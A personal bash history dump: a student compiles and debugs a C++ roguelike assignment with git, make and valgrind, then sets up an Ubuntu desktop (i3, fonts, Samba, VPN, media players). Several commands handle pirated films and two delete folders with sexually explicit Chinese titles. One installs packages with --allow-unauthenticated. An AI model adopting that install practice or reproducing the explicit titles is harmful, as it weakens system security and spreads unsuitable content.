+ls +ls -a +git pull origin master -f +mkdir C++AssignmentNew +git clonestopher.assignment-1.git +ls +rm Konopka_Christopher.assignment-2 +rm Konopka_Christopher.assignment-1 +rmdir Konopka_Christopher.assignment-1 +rmdir Konopka_Christopher.assignment-1 -f +git rebase +ls +rmdir 327_test_dungeons/ +git pull origin master +ls +make +rm * +git pull origin master +ls +rm * +git pull origin master +ls +make +./main +ls Makefile +vim Makefile +./rlg327 +vim Makefile +ls +ls +ls -a + +ls +vim heap.cpp +ls +vim .vimrc +vim heap.cpp +vim test +ls +vim .vimrc +ls +ls -a +rm .vimrc ~ +mv .vimrc ~ +mvdir .vimrc ~ +mv .vimrc ~/ +mv /.vimrc ~/ +ls -a +rm .vimrc +vim heap.cpp +ls -a +ls -a +vim .vimrc +ls -a +vim heap.cpp +ls -a +mv .vimrc ~/ +ls -a +vim heap.cpp +vim .vimrc +vim Makefile +vim Konopka_Christopher.assignment-1 +vim io.cpp +make +.rlg327 +./rlg327 +valgrind ./rlg327 +ls +vim npc.cpp +make clean +make +valgrind --leak-check=full ./rlg327 +valgrind --leak-check=full --track-origins=yes ./rlg327 +valgrind --leak-check=full --track-origins=yes -v ./rlg327 +vim descriptions.cpp +vim add . +git add . +git commit -m "progress" +vim dungeon.cpp +git ref log +gitreflog +git reflog +git reset --hard HEAD@{0} +vim npc.cpp +vim character.cpp +make +./rlg327 +valgrind ./rlg327 +vim npc.cpp +ls -a +ls -a +ls -a +vim monster_desc.txt +make +make +./rlg327 +vim ./rlg327 +exit +vim dungeon.cpp +exit +vim item.cpp +:exit +exit +vim io.cpp +exit +vim io.cpp +ls -a +ls -a +vim object_desc.txt +vim io.cpp +vim .rlg327/ +vim io.cpp +ls -a +vim monster_desc.txt +exit +make clean +git add . +git commit -m "removed extra files" +git push origin master +vim rlg327.cpp +git add . +make clean +ls -a +git add . + +git push origin master +git add . +git commit -m "undid delete" +vim rlg327.cpp +git add . +git comit -m "undid delte" +git commit -m "undid delte" +git push origin master +git push origin master! +git push -f origin master +git push origin master +make +vim move.h +git reflog +git reset --hard HEAD@{3} +make +./rlg327 +./rlg327 --nummon 1 +ls +make clean +ls +git push origin master +git push origin master -f +la +ls +git status +git add . + +git push origin master +./rlg327 +make +./rlg327 +exit +make +make clean +make +./rlg327 +valgrind ./rlg327 +ls -a +ls -a +vim monster_desc.txt +make +./rlg327 +valgrind ./rlg327 +vim io.cpp +./rlg327 --nummon 1 +valgrind ./rlg327 +./rlg327 --leak-check=full +valgrind --leak-check=full ./rlg327 +valgrind -v ./rlg327 +vim .rlg327 +vim rlg327.cpp +vim .rlg327 +make +./rlg327 --nummmon 1 +./rlg327 --nummon 1 +valgrind -v ./rlg327 --nummon 1 +valgrind -v ./rlg327 --nummon 1.@...... +vim npc.cpp +valgrind -v ./rlg327 --nummon 1 +vim rlg327.cpp +valgrind -v ./rlg327 --nummon 1 +valgrind -v ./rlg327 +vim rlg327.cpp +valgrind -v ./rlg327 --nummon 1 +vim npc.cpp +valgrind -v ./rlg327 + +vim npc.cpp +git add . +git commit -m "fairly finished" +git push origin master +make +./rlg327 +git push origin master +git log +vim move.h +mkdir Konopka_Christopher.assignment-1.8 +git init +git remote add originstopher.assignment-1.git +git pull origin master +ls -a +git log +vim character.cpp +exit +vim pc.cpp +.rlg327 --nummon 1 +./rlg327 --nummon 1 +vim pc.cpp +valgrind ./rlg327 -v +valgrind -v ./rlg327 +valgrind --leak-check=full ./rlg327 +valgrind --leak-check=full -v ./rlg327 +vim pc.cpp +exit +vim pc.h +vim io.cpp +exit +vim io.cpp +vim io.cpp +exit +vim io.cpp +exit +vim io.cpp +exit +vim move.cpp +vim move.cpp +ls -a +ls -a +vim monster_desc.txt +./rlg327 +vim monster_desc.txt +vim .rlg327 +vim monster_desc.txt +./rlg327 --nummon 1 +git add . +git commit -m "1.9 implemented, trial 1" +make clean +git add . +git commit -m "1.9 implemented, trial 2, removed extras" +git push origin master +exit +./rlg327 +make +./rlg327 +exit +mkdir Konopka_Christopher.assignment-1.10 +git remote add originstopher.assignment-1.git +git init +git remote add originstopher.assignment-1.git +git pull origin master +ls +vim rlg327.cpp +vim io.cpp +ls +ls +vim io.cpp +make clean +make +vim Makefile +ls +ls +vim .rlg327/ +vim io.cpp +ecit +vim io.cpp +exit +vim pc.cpp +exit +./rlg327 +vim io.cpp +vim object_desc.txt +./rlg327 +vim move.cpp +vim .rlg327/ +ls +vim object_desc.txt +./rlg327 +./rlg327 +vim move.h +vim object_desc.txt +./rlg327 +./rlg327 +vim move.cpp +exit +vim npc.cpp +exit +vim npc.cpp +l +ls +ls +ls +vi urls.py +ls +vi final.html +vi analyze.html +ls +vi bootstrap.min.css +vi jumbotron.css +ls +vi analyze.html +ls +ls +ls +vi analyze.html +ls +ls +wq +clear +ls +cp /home/uma/Mark/analysis/static /home/uma/Mark +ls +cp /home/uma/Mark/analysis/static /home/uma/Mark +clear +ls +vi upload.html +vi views.py +ls +vi urls.py +ls +vi home.html +vi upload.html +vi analyze.html +rm java_old.snippets +ls +exit +job +jobs +fg 1 +vim ~/.vimrc +sudo poweroff +ls +eclimd +./eclimd +vim +sudo apt update +apt list --upgradable +apt upgrade +sudo apt upgrade +sudo apt-add-repository ppa:varlesh-l/papirus-pack +sudo apt-get udpate +sudo apt-get update +sudo apt install papirus-gtk-icon-theme +ls +rm launcher_arrow_* +ls +sudo find / -name ".themes" +ls /usr/share/themes +sudo find / -iname "logo-ubuntu_cof-orange-hex.svg" +ls +ls +mv launcher_bfb.png launcher_bfb_backup.png +sudo mv launcher_bfb.png launcher_bfb_backup.png +sudo cp ~/mydata/linux\ tools/logo-ubuntu_cof-orange-hex.svg launcher_bfb.png +rm launcher_bfb.png +sudo rm launcher_bfb.png +sudo mv ~/mydata/linux\ tools/logo-ubuntu_cof-orange-hex2.png launcher_bfb.png +htop +sudo apt install exuberant-ctags +ls +unzip --help +ls +unzip src.zip -d src +ls +ls +ls +ls +ctags --help +ctags -R --language-force=java -f .tags ./ +ls +ls -a +vim +ls +ls -al +rm *.log +ls -al +ls +rm -vf 微博紅人米妮大萌萌高清淫聲浪語電動玩騷逼\ 國產老婆黑絲長靴情趣套裝大雞雞直蹦達/ +rm -rvf 微博紅人米妮大萌萌高清淫聲浪語電動玩騷逼\ 國產老婆黑絲長靴情趣套裝大雞雞直蹦達/ +ls +ls -al +ls -l +ls +rm -rvf 偷拍美熟女张仲华开房肏屄纪实\ 国内极品风骚露脸老婆在家被我狂插还让我轻点/ +fg 1 +vim +pkill firefox +sudo poweroff +vim ~/.vimrc +echo $ECLIM +ls +./eclimd +sudo cat /etc/default/apport +ls /var/crash/ +sudo rm -v /var/crash/* +ls /var/crash/ +sudo vim /etc/default/apport +sudo reboot +ls /var/crash/ +sudo apt-cache policy smplayer +pkill astrill +pkill chrome +sudo apt update +sudo apt upgrade +vim +fg +jobs +vim +ls +du +ls +ls -t +ls -rt +rm -rv Keanu.2016.720p.BluRay.x264-DRONES\[rarbg\]/ +rm -rv Angry.Birds.2016.1080p.BluRay.x264-GECKOS\[rarbg\]/ +rm -rv Independence.Day.1996.REMASTERED.EXTENDED.1080p.BluRay.x264.DTS-ETRG/ +ls -rt +ls +smplayer dioguitar23.net_DRC-143.mp4 +rm -vf dioguitar23.net_DRC-143-SD/ +rm -rvf dioguitar23.net_DRC-143-SD/ +ls +ls +rm -rvf TDDOWNLOADS/ +ls +smplayer Londonpad.2016.1080p.WEB-DL.mkv +rm -rvf Londonpad.2016.1080p.WEB-DL.mkv +smplayer disigongming.mp4 +rm -rvf jing-tian-zhan-shen-* +ls -rt +ls +sudo poweroff +du -sh +du -sh * +df -h +top +sudo apt update +sudo apt upgrade +ls -rt +ls +smplayer The.Legend.of.Tarzan.2016.1080p.HDRip.KORSUB.x264.AAC2.0-STUTTERSHIT.mp4 +sudo poweroff +vim +pkill firefox chrome +pkill firefox +pkill chrome +du -sh /var/cache/apt/archives/ +sudo du -sh /var/cache/apt/archives/ +sudo apt clean +sudo du -sh /var/cache/apt/archives/ +sudo apt autoremove --purge +sudo apt remove lantern +sudo apt remove --purge libreoffice* +sudo apt clean +sudo apt autoremove --purge +dpkg -l | grep bcloud +dpkg -P bcloud +sudo dpkg -P bcloud +dpkg -l | grep bcloud +dpkg -l | grep xdesk +dpkg -l | grep xware +dpkg -P xware-desktop +sudo dpkg -P xware-desktop +ls +sudo rm -rv .xware-desktop +sudo apt install bleachbit +sudo du -sh /var/cache/apt/archives/ +sudo du -h /var/cache/apt/archives/ +sudo apt remove arc-them eset +set +path +ls +./eclimd +cat /etc/apt/sources.list +sudo vim /etc/apt/sources.list +vim /etc/apt/sources.list.d/grep -RoPish '(?<=ppa.launchpad.net/)[^/]+/[^/ ]+' /etc/apt | sort -u | sed 's/^/ppa:/' +grep -RoPish '(?<=ppa.launchpad.net/)[^/]+/[^/ ]+' /etc/apt | sort -u | sed 's/^/ppa:/' +grep -RoPish '(?<=ppa.launchpad.net/)[^/]+/[^/ ]+' /etc/apt +grep -RoPish '(?<=ppa.launchpad.net/)[^/]+/[^/ ]+' /etc/apt | sort -u +top +grep -RoPish '(?<=ppa.launchpad.net/)[^/]+/[^/ ]+' /etc/apt | sort -u | sed 's/^/ppa:/' +grep '(?<=ppa.launchpad.net/)[^/]+/[^/ ]+' /etc/apt | sort -u | sed 's/^/ppa:/' +man grep +grep -RPish '(?<=ppa.launchpad.net/)' +grep -RPish '(?<=ppa.launchpad.net/)' /etc/apt | sort -u +man sort +ls +ls +mv nautilus.svg nautilus_back.svg +sudo mv nautilus.svg nautilus_back.svg +sudo cp ../places/folder-home.svg nautilus.svg +vim +e.svg nautilus.svg +sudo apt update +sudo add-apt-repository ppa:birdie-team/stable +sudo apt update +sudo apt-add-repository ppa:birdie-team/daily +sudo apt update +sudo apt install birdie +sudo apt update +sudo apt install birdie +sudo add-apt-repository --remove ppa:birdie-team/stable +sudo add-apt-repository --remove ppa:birdie-team/daily +ls +sudo mv system-file-manager.svg system-file-manager_back.svg + +sudo mv system-file-manager_back.svg system-file-manager.svg +top +sudo cp /usr/share/icons/Papirus-GTK/48x48/apps/launcher_bfb.png /usr/share/unity/icons/ +vim +snap find +snap find firefox +snap --help +snap list +snap install hello-world +sudo snap install hello-world +hello-world +snap list +snap find +sudo poweroff +wget baiduyun +wgetstrill4u.com/downloads/astrill-setup-linux64.deb -P ~/mydata/linux\ tools/ +apt-cache pkgnames +apt-cache pkgnames | less +apt-cache pkgnames | grep "astrill" +sudo apt purge astrill +ls -sta +ls -rtl +ls -rtl | grep 'astrill' +rm -vf astrill-setup-linux64.deb +ls -rtl | grep 'astrill' +rm -vf astrill-setup-linux.deb +ls -rtl | grep 'astrill' +mv astrill-setup-linux64.deb.1 astrill-setup-linux64-3.2.2085.deb +ls -rtl | grep 'astrill' +sudo dpkg -i astrill-setup-linux64-3.2.2085.deb +mv astrill-setup-linux64-3.2.2085.deb astrill-setup-linux64-3.2.2058.deb +sudo poweroff +astrill --version +pkill astrill +wget --help +man wget +apt-cache --help +apt-cache pkgnames +ls +rm -rv google-chrome +ls +sudo poweroff +pkill firefox +ls -rn +dpkg -l | grep chrome +sudo apt-get purge google-chrome-stable +sudo apt-get update +sudo apt-get upgrade +sudo apt-get search google +sudo apt search google +sudo apt search google-chrome +ls +sudo dpkg -i google-chrome-stable_current_amd64.deb +pkill nautilus +nautilus +sudo apt purge chromium-browser +ls +rm -rv chromium +rm -rv google-chrome +ping www.baidu.com +sudo apt update +sudo apt upgrade +smplayer 魔兽.官方中英字幕.Warcraft.2016.HD1080P.X264.AAC.English.CHS-ENG.Mp4Ba/魔兽.官方中英字幕.Warcraft.2016.HD1080P.X264.AAC.English.CHS-ENG.Mp4Ba.mp4 +pkill astrill +vim +sudo poweroff +vim +sudo poweroff +sudo apt update +sudo apt upgrade +sudo apt update +sudo apt upgrade +sudo add-apt-repository ppa:ubuntuhandbook1/corebird +sudo apt-cache policy corebird +sudo apt update +sudo apt install corebird +sudo apt-cache policy corebird +sudo dpkg -i youdao-dict_1.1.0-0-ubuntu_amd64.deb +dpkg -P youdao-dict +sudo dpkg -P youdao-dict +apt-cache policy python3 +apt-cache policy python3-xlib +dpkg -X youdao-dict_1.1.0-0-ubuntu_amd64.deb youdao-dict +ls +ls -al +dpkg -e ../youdao-dict_1.1.0-0-ubuntu_amd64.deb DEBIAN +ls +ls +vim control +dpkg -deb -b ../youdao-dict/ youdaobuild.deb + +dpkg -i youdaobuild.deb +sudo dpkg -i youdaobuild.deb +sudo dpkg -P youdao-dict +apt-cache search sdcv +apt-cache policy sdcv +apt-cache policy goldendict +sudo apt-get install goldendict +ls +ls +pwd +mkdir .fonts +ls +ls +ls +7z x \[牛津英汉词典音标字体\]kingsoft_phonetic_ue.ttf.7z +sudo apt install p7zip-full +7z x \[牛津英汉词典音标字体\]kingsoft_phonetic_ue.ttf.7z +ls +ls +cp kingsoft_phonetic_ue.ttf ~/.fonts/ +ls +fc-cache -f -v +find . -iname "king" +find . -iname "king*" +ls +cp kingsoft_phonetic_ue.ttf /usr/share/fonts/truetype/ +sudo cp kingsoft_phonetic_ue.ttf /usr/share/fonts/truetype/ +ls +sudo chmod 755 kingsoft_phonetic_ue.ttf -R +fc-cache -f -v +pkill smplayer +pkill nautilus +nautilus +top +pkill Xorg +sudo pkill Xorg +sudo shutdown +sudo reboot +top +startx +man hier +sudo dpkg -i mydata/linux\ tools/sendanywhere_latest_amd64.deb +find mydata/ -iname king* +top +cat /etc/X11/xinit/xinitrc +sudo poweroff +vim +vim -S datastructure.vim +ls .vim +ls .vim/sessions/ +vim -S .vim/sessions/datastructure.vim +vim --servername vim --help +vim +top +fg 1 +vim /etc/fonts/conf.d/49-sansserif.conf +sudo vim /etc/fonts/conf.d/49-sansserif.conf +ls +sudo cp 49-sansserif.conf 49-sansserif.conf.bak +ls +fg 1 +sudo vim 49-sansserif.conf +sudo rm 49-sansserif.conf +mv 49-sansserif.conf.bak 49-sansserif.conf + +sudo mv 49-sansserif.conf.bak 49-sansserif.conf +ls +vim 49-sansserif.conf +sudo vim /etc/fonts/fonts.conf +jobs +sudo vim /etc/fonts/local.conf +sudo apt update +sudo apt upgrade +X -version +sudo X -version +ls +ls +sudo dpkg -i youdao-dict_1.1.0-0-ubuntu_amd64.deb > youdaooutput.txt +cat youdaooutput.txt +ls +sudo apt-get -f install +youdao +sudo dpkg -l | grep youdao +youdao-dict +sudo dpkg -P youdao-dict +find / -iname "64-language-selector*" +sudo find / -iname "64-language-selector*" +sudo reboot +ls +cat local.conf +rm local.conf +sudo rm local.conf +ls +vim +ls +cp ~/mydata/linux\ tools/NotoSansCJKsc-hinted/* . +ls +rm LICENSE_OFL.txt +ls +ls +ls -rt +rm -rv Now.You.See.Me.2.2016.720p.BluRay.H264.AAC-RARBG/ +rm -rv The.Legend.of.Tarzan.2016.1080p.HDRip.KORSUB.x264.AAC2.0-STUTTERSHIT/ +sudo poweroff +nethack +sudo poweroff +sudo apt update +sudo apt install nethack-console +ls +smplay 火锅英雄.Chongqing.Hot.Pot.2016.HD1080P.X264.AAC.Mandarin.CHS-ENG.Mp4Ba/ +ls +smplayer +smplayer 火锅英雄.Chongqing.Hot.Pot.2016.HD1080P.X264.AAC.Mandarin.CHS-ENG.Mp4Ba.mp4 +vim -S ~/.vim/sessions/datastructure.vim +vim --version | grep python +fg 1 +sudo poweroff +sudo apt update +sudo apt upgrade +top +pkill vim +asdf sdf +catf +cat +tar xvf vimcdoc-1.9.0.tar.gz +ls +python3 +ls +./hello.py +chmod a+x hello.py +./hello.py +vim +vim -h +vim +vim mydata/vim/.vimrc +vim +vim -S ~/.vim/sessions/datastructure.vim +im +vim +vim -S ~/.vim/sessions/datastructure.vim +cp ~/.vimrc mydata/vim/ +vim mydata/vim/.vimrc +vim ~/.vimrc +vim +vim ~/.vimrc +python3 +vim +ls mydata/vim/ +fg 1 +ls mydata/vim/ +ls +rm HelloWorld.py/ +rm -r HelloWorld.py/ +ls +fg 1 +ls +ls +ls +rm -rv test/ +ls +ls +sudo poweroff +pidof systemdd +pidof systemd +pidof init +systemd-analyze blame +systemd-analyze plot > mydata/bootimage +systemctl list-dependencies vmware-workstation-server.service --reverse +systemctl list-dependencies vmware-workstation-server.servic +vmware --version +systemctl list-dependencies vmware.service +systemctl list-dependencies vmware.service --reverse +sudo apt update +sudo apt upgrade +sudo apt install bum +systemctl list-dependencies virtualbox.service +apt-cache policy vmware-manager +systemctl list-dependencies vmware.service --reverse +systemctl status vmware.service +systemd-analyze blame +man systemctl +ntsysv +systemctl status vmware.service +dpkg -l | grep vmware +systemd-analyze blame +vmware-installer -u vmware-workstation +sudo vmware-installer -u vmware-workstation +sudo reboot +sudo vim /etc/default/grub +sudo update-grub +sudo reboot +ls +ls -rt +ls +smplayer Now.You.See.Me.2.2016.720p.BluRay.x264.DD5.1-FGT.mkv +pkill astrill +ls +./hello.py + +./hello.py +df +cat /var/log/trim.log +cp .vim/bundle/ultisnips/ +cp .vim/bundle/vim-snippets/UltiSnips/python.snippets .vim/MySnips/ +vim mydata/vim/python/test/hello.py +sudo poweroff +sudo apt update +sudo apt upgrade +cat .vimrc +find . -iname .vimrc* +touch .vimrc.empty +find . -iname .vimrc* +./hello.py +pythone +python +./hello.py +cat .vimrc +./hello.py +vim mydata/vim/python/test/hello.py +vim -S .vim/sessions/python.vim +vim +vim -u NONE +vim -S .vim/sessions/python.vim +sudo reboot +vim +sudo poweroff +sudo apt update +sudo apt upgrade +source .bashrc +ls +ls -al +ls +rm -rv vim +vim text.java +pushd ~/mydata/ +pushd ~/mydata/vim/ +pushd .vim +dirs +pushd +dirs +pushd +pushd+2 +pushd +2 +dirs +pushd git/ +dirs +pushd geeknote/ +pushd ~ +dirs +sudo add-apt-repository ppa:otto-kesselgulasch/gimp +sudo apt-get udpate +sudo apt-get update +sudo apt install gimp +pkill astrill +vim -S ~/.vim/sessions/python.vim +cat .bashrc +dirs +pushd +dirs +pushd +ls +dirs +popd +pushd vim/python/ +dirs +popd +vim .bashshrc +vim .bashrc +vim text.java +vim .bashrc +jobs +fg 1 +sudo poweroff +sudo apt update +sudo apt install libimobiledevice6 +apt-cache policy libimobiledevice6 +ls +cat smb.conf +ls +smppasswd -a damon +smbpasswd -a root +smbpasswd -a damon +sudo smbpasswd -a damon +service smb restart +service smb start +service smbd start +service smbd ip addr show +ip addr show +service smbd restart +ls +sh copyPic.sh +sh --help +sh -n copyPic.sh +sh -x copyPic.sh +shcopyPic.sh +sh copyPic.sh +bash ./copyPic.sh +sudo vim /etc/samba/smb.conf +ipconfig -a +ifconfig -a +ifconfig -s +ls /etc/samba/ +ls /etc/init.d/ +find . -iname "smb" +find . -iname "samba" +sudo find . -iname "samba" +find ~ -iname "samba" +find . -iname samba +ls +find . -iname 'fstrim' +find . -iname 'samba' +jobs +mkdir shell +vim copyPic.sh +ls +cat sh.snippets +ls +cp sh.snippets ~/.vim/MySnips/ +ls +cat sh.snippets +fg 1 +pkill astrill +sudo poweroff +vim shell/copyPic.sh +grep -in "date" ~/.vim/bundle/vim-snippets/UltiSnips/* +grep -in "[^a-z]date" ~/.vim/bundle/vim-snippets/UltiSnips/* +man date +exit +sudo apt update +sudo apt upgrade +bash ./copyPic.sh +bash ./copyPic.sh +date +date +%Y +man date +echo $? +bash .././ifTest.sh +bash ./copyPic.sh +pushd ~/Pictures/icons/All +rm -r All +pushd 1 +dirs +pushd +1 +bash ./copyPic.sh +pushd +1 +ls +ls +pushd +1 +bash ./copyPic.sh +pushd +1 +ls -lR | grep "^-" +ls -lR | grep "^-" | wc -l +ls -lR | grep "^d" +df ./* +df . +du . +du -h +ls -lR | grep "^-" | wc -l +ls +ls +ls -lR | grep "^-" | wc -l +pushd +1 +bash ./copyPic.sh +var=xxx/yyy/ddd +echo ${var#/} +echo ${var##/} +echo ${var%/*} +bash ./copyPic.sh +ls -lR | grep "^-" | wc -l +bash ./copyPic.sh +ls ~/mydata/ +ls +cp tmp.markdown tmp.markdown.bak +history | awk '{print $2}' | sort | uniq -c| sort -rn|head +cat tmp.markdown +echo test +echo test test +echo test test >> tmp.markdown +cat tmp.markdown +1c +cat tmp.markdown +echo $PATH | tr ':' ' +' +dpkg -l | grep 'firefox' +dpkg -l | grep 'firefox' | awk '{print $1}' +dpkg -l | grep 'firefox' | awk '{print $2}' +dpkg -l | grep 'firefox' | awk '{print $2 \t $3}' +dpkg -l | grep 'firefox' | awk '{print $2\t$3}' +dpkg -l | grep 'firefox' | awk '{print $2$3}' +dpkg -l | grep 'firefox' | awk '{print $2"\t"$3}' +dpkg -l | grep 'firefox' +dpkg -l | grep 'firefox' | awk '{print $2"\t"$4}' +dpkg -l | grep 'firefox' | awk '{print $2"\t"$5}' +df -h +df -h | sort -k 5 +find ~ -iname "*.bashrc" +source ~/.bashrc +df -h +ls -al +df -h +ps -o pid, comm +ps -o pid, command +ps -o pid, comm | body sort -k2 +df -h | sort -k 5 +df -h | body sort -k 5 +df -h | sort -k 5 +df -h | body sort -k 5 +ps -eo pid,%cpu,cmd +ps -eo pid,%cpu,cmd | sort -nrk2 | head +ps -eo pid,%cpu,cmd | body sort -nrk2 | head +ps -o pid,cmd +ps -o pid,cmd | sort -k2 +ps -o pid,cmd | body sort -k2 +df -h | sort -k 5 +man sort +df -h | sort -k 1 +df -h | sort -k 2 +df -h | sort -k 3 +df -h | sort -k 4 +df -h | sort -nk2 +df -h | sort -nk5 +df -h | sort -r'nk5 +df -h | sort -rnk5 +df -h | body sort -rnk5 +df -h | sort -rnk5 +source ~/.bashrc +ps + +df -h | sort -rnk5 +df -h | bodysort -rnk5 +df -h | body sort -rnk5 +ls -a +ls -al +ll +ll -hs +ll | sort -nk5 +ll | sort -nkr5 +ll | sort -nrk5 +dirs +pushd +1 +ls +rm -r All/ +ls +sudo apt update +sudo apt upgrade +sudo cp /usr/share/icons/Papirus-Dark-GTK/48x48/apps/launcher_bfb.png /urs/share/unity/icons/ +sudo cp /usr/share/icons/Papirus-Dark-GTK/48x48/apps/launcher_bfb.png /usr/share/unity/icons/ +pkill astrill +ifconfig -a +bash .././ifTest.sh +bash ifTest.sh +sudo tail -3 /var/log/syslog +sudo tail -3 /var/log/trim.log +sudo tail -2 /var/log/trim.log +ls +cp text.txt{,.bak} +ls +mv text.{txt,markdown} +ls +find ~ -type d -empty +tree +dig +short txt linux.wp.dg.cx +cal +ls +ls | convert label:@-image.png +vim -S ~/.vim/sessions/shell.vim +sudo poweroff +vim -S .vim/sessions/shell.vim +bash ./if +bash ./ifTest.sh +vim -S .vim/sessions/shell.vim +ls +ls -rt +ls +ls +ls +ls +cp ~/mydata/video/Zootopia.2016.1080p.BluRay.x264-SPARKS\[rarbg\] /media/damon/Disk2-2/Movie/ +cp -r ~/mydata/video/Zootopia.2016.1080p.BluRay.x264-SPARKS\[rarbg\] /media/damon/Disk2-2/Movie/ +fg 1 +ls +ls -st +ls -rt +rm -r The.Jungle.Book.2016.1080p.BluRay.x264.DTS-FGT/ +rm -r *.CHongqing.Hot.Pot +rm -r *.CHongqing.Hot.Pot* +rm -r *.Chongqing.Hot.Pot* +rm -f Now.You.See.Me.2.2016.720p.BluRay.x264.DD5.1-FGT/ +ls -rt +rm -rf Now.You.See.Me.2.2016.720p.BluRay.x264.DD5.1-FGT/ +ls -rt +bash ./ifTest.sh +pkill astrill +df -a +du +df +bash ./ifTest.sh arg1 arg2 +pkill astrill +sudo apt update +sudo apt upgrade +pkill chromium-browser +pkill chromium-browse +vim -S .vim/sessions/shell.vim +sudo poweroff +ls -d +ls +cat +ls -d */ +man ls +ls -d */ +ls +ls -rt +rm -r Kingsglaive.Final.Fantasy.XV.2016.1080p.WEB-DL.AAC2.0.H264-FGT/ +sudo apt update +sudo apt upgrade +sudo apt install compiz-plugins + +sudo apt install i3-wm +exit +chrome +chromium-browser +exit +vim .config/i3/config +logout +exit +logout +ls +ls +vim config +sudo apt upgrade +sudo logout +reboot +logout +sudo apt-get purge --auto-remove i3-wm +apt-cache policy awesome +sudo apt install awesome +logout +gnome-session-quit +chromium-browser +sudo vim /etc/apt/sources.list +sudo apt update +su +echo "debsur5r.net/i3/ $(lsb_release -c -s) universe" sudo >> /etc/apt/sources.list +echo "debsur5r.net/i3/ $(lsb_release -c -s) universe" | sudo tee --append /etc/apt/sources.list +sudo vim /etc/apt/sources.list +sudo apt update +sudo apt-get --allow-unauthenticated install sur5r-keyring +sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys E3CA1A89941C42E6 +sudo apt-get --allow-unauthenticated install sur5r-keyring +sudo apt update +sudo apt-get --allow-unauthenticated install sur5r-keyring +sudo apt update +sudo apt-cache policy i3 +sudo apt install i3 +tp +top +apt-cache policy i3-wm +echo "debsur5r.net/i3/ $(lsb_release -c -s) universe" >> /etc/apt/sources.list +sudo echo "debsur5r.net/i3/ $(lsb_release -c -s) universe" >> /etc/apt/sources.list +echo "debsur5r.net/i3/ $(lsb_release -c -s) universe" >> sudo /etc/apt/sources.list +sudo apt update +sudo apt-cache policy i3 +man i3 +emacs +emacs -nw -Q +vim .bashrc +tile 10 ~/.bash_history +tail 10 ~/.bash_history +head ~/.bash_history +tail ~/.bash_history +fg 1 +man wc +fg 1 +fg 1 +vim .bashrc +vim .bashrc +apt-cache policy emacsa +apt-cache policy emacs +sudo apt installemacs +sudo apt install emacs +wc -l ~/.bash_history +sudo find / -iname "powerline" +ls .fonts +sudo find / -iname "powerline.sh" +sudo find / -iname "*powerline.sh" +sudo apt install powerline +sudo find / -iname "*powerline.sh" +ls +ls -rt +mv *144].zip 144.zip +ls -rt +tar xvf 144.zip +man shopt +ps aux +ps +ps a +ps aux +ps aux | grep chromium +gnome-session-quit +awesome --help +awesome -h +man awesome +sudo find / -iname '*i3/config*' +sudo find / -iname '*i3*config*' +vim config +pwd +fg 1 +vim ~/.config/i3/config +top +vim ~/.config/i3/config +astrill +vim +sudo find / -iname 'astrill' +pkill astrill +./astrill +fg 1 +vim ~/.config/i3/config +vim mydata/vim/wiznote/i3config.markdown +sudo poweroff +pkill astrill +find ~ -iname 'bash_history' +find . -iname "*bash*" +grep "apt install" .bash_history +grep "add-apt" .bash_history +grep "apt install" .bash_history + PROMPT_COMMAND=${PROMPT_COMMAND:+$PROMPT_COMMAND; }'pwd>&8;kill -STOP $$' +top +ls -a +ls -al +man terminator +pwd +man terminator_config +man terminator +pwd +sdf +sudo killall chromium-browser +rm -rf ~/.config/chromium/Default/Web\ Data +rm -rf ~/.config/google-chrome/Default/Web\ Data +rm -rf ~/.config/chromium/Default/Web\ Data +rm -rf ~/.config/google-chrome/Default/Web\ Data +apt-cache policy ranger +sudo apt install ranger +sudo apt update +apt list +apt list | grep firefox +apt list | grep midnight +sudo apt-cache policy mc +sudo add-apt-repository ppa:eugenesan/ppa +sudo apt update +apt-cache policy mc +sudo apt install mc +sudo add-apt-repository ppa:gnome-terminator +sudo apt update +sudo apt install terminator +sudo apt install krusader +sudo apt-get purge --auto-remove krusader +sudo apt install pepperflashplugin-nonfree + +sudo apt install manpages-zh +apt-cache policy manpages-zh +sudo apt purge manpages-zh +terminator -l mydefault +terminator --help +terminator -l my +terminator --layout=my +ranger +ranger +apt list +apt list | grep ranger +ranger +grep "install" ~/.bash_history +sudo apt install ranger +ranger +vim ~/.config/i3/config +ranger +vim ~/.config/i3/config +ranger +vim ./.bashrc +apt-cache policy x-tile +vim ~/.config/i3/config +top +pkill nautilus +sudo apt update +sudo apt install x-tile +sudo apt purge x-tile +apt-cache policy python-appindicator +sudo add-apt-repository ppa:giuspen/ppa +sudo apt install x-tile +apt-cache policy python-appindicator +sudo apt install python-appindicator +grep "install" ~/.bash_history +sudo apt purge x-tile +sudo apt purgepython-appindicator +sudo apt purge python-appindicator +vim ~/.config/i3/config +ranger +systemctl suspend +top +pkill xorg +top +pidof xorg +pidof Xorg +kill -9 28728 +pidof Xorg +reboot +sudo apt update +sudo apt upgrade +amixer -D pulse sset Master 5%+ +pactl list +aplay -l +alsamixer +vim ~/.config/i3/config +pactl list sinks +pidof pulseaudio +amixer set Master unmute +pactl set-sink-mute 0 0 +ls /usr/local/ +find / -iname "chromium" +sudo find / -iname "chromium" +sudo find / -iname "chrome" +which chrome +which google-chrome +which chromium-browser +gnome-terminal +which gnome-terminal +ranger +echo $TERMINAL +vim ~/.config/i3/config +man i3-sensible-terminal +fg 1 +i3-font +ranger +i3status +ls ~/.config/ +cat /etc/i3status.conf +mkdir i3status +cp /etc/i3status.conf . +vim i3status.conf +vim ~/.config/i3/config +sudo find / -iname "i3status.conf" +rm -rv i3status/ +df +df -hs +df -h +find / -iname "i3blocks.conf" +sudo find / -iname "i3blocks.conf" +sudo find / -iname "fontawesome*" +vim /etc/i3status.conf +vim ~/.config/i3status/i3status.conf +i3status +cp /etc/i3status.conf ~/.i3status.conf +cat .i3status.conf +vim .i3status.conf +sudo poweroff +vim ~/.config/i3/config +export PS1 + PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ ' +echo $LS_COLORS +echo $PS1 +vim ~/.bashrc +sudo apt update +sudo apt-add-repository remove send-anywhere +sudo apt install rofi +rofi +rofi -show run +vim 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+vim ~/.config/i3/config + +./configure +apt-cache search glib +apt-cache search glib- +sudo apt install libgtk2.0-dev +./configure +grep "install" ~/.bash_history +sudo apt-get autoremove +rofi -show run +apt-cache policy xcb-u +apt remove xcb-uti +sudo dpkg -i rofi_1.2.0-1_amd64.deb +sudo apt install libxcb-ewmh2, libxcb-xrm0 +sudo apt install libxcb-ewmh2 libxcb-xrm0 +sudo dpkg -i rofi_1.2.0-1_amd64.deb +rofi -show run +sudo find / 